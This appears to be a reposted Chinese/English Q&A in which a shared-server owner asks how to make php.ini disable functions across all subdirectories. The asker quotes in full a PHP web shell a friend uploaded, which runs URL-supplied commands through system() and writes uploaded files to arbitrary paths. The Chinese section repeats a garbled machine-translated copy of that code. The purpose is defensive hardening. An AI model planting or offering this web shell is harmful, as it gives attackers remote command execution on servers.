如何让我的 php.ini 文件影响我服务器的所有目录/子目录? [英] How do I enable my php.ini file to affect all directories/sub-directories of my server?
问题描述
几周前,我在共享服务器上打开了一个漏洞,我的朋友上传了以下 PHP 脚本:
";$cmd = ($_REQUEST['cmd']);系统($cmd);echo "</pre>";死;}?><?phpif(isset($_REQUEST['上传'])){echo '
';}?><?phpif(isset($_REQUEST['send'])) {$uploaddir = $_POST["direct"];$uploadfile = $uploaddir .basename($_FILES['userfile']['name']);如果 (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {echo "文件有效,上传成功.\n";回声 $uploaddir;} 别的 {echo "上传失败";}}?>
此脚本允许他通过 URL 内变量处理命令.
我在 public_html 目录的 php.ini 文件中禁用了系统和其他功能.如果脚本位于我的 public_html 目录中,这将阻止脚本运行,但如果它位于该目录的子目录中,则不会停止运行.如果我将 php.ini 文件复制到子目录中,它将阻止它从该目录运行.
我的问题是,如何让我的 php.ini 文件影响我服务器的所有目录/子目录?
谢谢各位,你们的回答很棒,但一直都在我眼皮底下.通过 cPanel,我能够编辑我的服务器以使用单个 php.ini 文件.
A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<?php
if(isset($_REQUEST['upload'])) {
echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
Send this file: <input name="userfile" type="file" />
To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
<input type="submit" value="Send File" />
</form>';
}
?>
<?php
if(isset($_REQUEST['send'])) {
$uploaddir = $_POST["direct"];
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;
} else {
echo "Upload failed";
}
}
?>
This script allows him to process commands through in-URL variables.
I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.
My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?
Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.
这篇关于如何让我的 php.ini 文件影响我服务器的所有目录/子目录?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!